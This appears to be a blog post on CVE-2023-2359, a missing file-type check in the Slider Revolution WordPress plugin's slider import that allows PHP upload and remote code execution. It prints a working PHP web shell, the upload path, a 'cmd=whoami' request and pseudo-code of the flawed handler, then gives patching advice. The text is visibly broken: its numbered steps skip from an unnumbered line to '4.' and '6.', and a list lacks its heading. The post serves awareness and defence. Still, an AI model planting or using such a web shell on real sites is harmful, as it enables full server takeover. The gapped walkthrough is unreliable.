CVE-2023-2359 - How a File Validation Flaw in Slider Revolution Leads to WordPress RCE

If you’re running a site on WordPress and love a flashy homepage, chances are you’ve come across Slider Revolution. With millions of downloads, it’s a go-to plugin for gorgeous sliders and carousels. But sometimes, beauty comes at a cost. In this post, we’ll take a close look at CVE-2023-2359 — a vulnerability that let attackers upload any file, not just images, all thanks to a critical flaw in file validation.

What is CVE-2023-2359?

CVE-2023-2359 is a security vulnerability in the popular Slider Revolution WordPress plugin. Until version 6.6.12, this plugin did not properly check whether uploaded files were real image files during slider imports. As a result, a sneaky attacker could upload malicious code disguised as an image, which, under certain server settings, could let them run that code — giving them remote code execution (RCE) on your web server.

How Does It Work?

When you import a slider in Slider Revolution, you’re supposed to provide a nice, clean image file (like .jpg, .png, etc.). The plugin is supposed to check that file before it goes anywhere.

But, in vulnerable versions, there’s no real check that the file *is* an image. So, you could upload a .php file or any executable — and if your server allows running files from the upload directory (a common misconfiguration), an attacker can execute commands on your server!

The plugin stores the file without checking its type.

4. Attacker navigates to the uploaded file in a browser, triggering the malicious PHP code, and potentially gaining total control over your site.

Proof-of-Concept: Exploit in Action

Here’s a simplified demonstration. Remember: this is for educational purposes only.

Malicious PHP File (shell.php)

<?php
// An extremely simple PHP web shell
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
} else {
    echo "No command!";
}
?>

The file is placed in the upload directory, like:

https://your-site.com/wp-content/uploads/revslider/import/shell.php

You or the attacker visit that URL:

https://your-site.com/wp-content/uploads/revslider/import/shell.php?cmd=whoami
6. The server executes whoami and prints the username the server is using — proof you have code execution.

Let’s peek at how the vulnerable code looked (simplified)

// (Pseudo-code for the import handler)
if(isset($_FILES['import_file'])){
    $file = $_FILES['import_file'];
    $destination = WP_CONTENT_DIR . "/uploads/revslider/import/" . basename($file['name']);
    move_uploaded_file($file['tmp_name'], $destination);
    // ... no image type check!
}

There’s no verification that the uploaded file is, in fact, an image, or any content-based check. Anyone can put *anything* in there.

Default upload locations: Files land in a web-accessible folder.

- PHP execution: Some web servers, by misconfiguration, allow executing PHP files in the uploads directory.

How To Fix

Update your plugin! Version 6.6.13 and later fix this vulnerability. Go to your WordPress dashboard and update Slider Revolution immediately.

Extra safety tips

- Configure your web server (Apache/Nginx) to never execute PHP in uploads.

References

- WPScan Entry: CVE-2023-2359
- National Vulnerability Database (NVD) Entry
- Slider Revolution official changelog

Conclusion

CVE-2023-2359 is a sharp reminder that one missing check can open the door to your whole website. If you use Slider Revolution, update now. If you manage WordPress sites for others, check their plugin versions and educate your clients. And, if you run any kind of file import or upload feature, always validate the file type and restrict execution rights.

Timeline

Published on: 06/19/2023 11:15:10 UTC
Last modified on: 11/07/2023 04:12:26 UTC